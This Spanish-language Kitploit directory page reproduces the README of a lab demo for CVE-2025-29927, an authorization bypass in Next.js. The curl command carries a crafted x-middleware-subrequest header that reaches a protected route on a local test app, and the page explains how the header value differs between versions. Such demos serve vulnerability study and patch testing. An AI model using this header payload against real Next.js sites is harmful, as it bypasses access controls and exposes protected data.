Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-29927-demo — Demostración que reproduce la vulnerabilidad de omisión de autorización CVE-2025-29927 en Next.js. | Kitploit
Herramientas/GitHubGitHub/t3tra-dev/cve-2025-29927-demo
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubt3tra-dev/cve-2025-29927-demo

cve-2025-29927-demo

Demostración que reproduce la vulnerabilidad de omisión de autorización CVE-2025-29927 en Next.js.

Ver Repositorio
4hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

cve-2025-29927-demo

Demo que reproduce la vulnerabilidad de bypass de autorización en Next.js.

Para más detalles sobre esta vulnerabilidad, consulte Resumen de la vulnerabilidad CVE-2025-29927 de Next.js .

Método para reproducir la vulnerabilidad

  1. Clone este repositorio.
root@kitploit:~
git clone https://github.com/t3tra-dev/cve-2025-29927-demo.git
cd cve-2025-29927-demo
git pull origin main
  1. Inicie el servidor.
root@kitploit:~
npm install
npm run dev
  1. Envíe una solicitud con el encabezado x-middleware-subrequest usando curl u otra herramienta.
root@kitploit:~
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/protected

Esto provoca un bypass de autorización y permite acceder a la página /protected.

El valor middleware es el nombre del middleware que Next.js reconoce. En esta aplicación demo, existe un middleware llamado middleware, por lo que al especificar este valor se produce el bypass de autorización.

[!TIP] En Next.js 15.x, MAX_RECURSION_DEPTH está configurado en 5, por lo que es necesario repetir el valor de middleware 5 o más veces separado por :. En versiones anteriores (14.x), simplemente 'middleware' era suficiente. Esta aplicación demo usa Next.js 15.2.2, por lo que se requiere este valor.

Descargar herramienta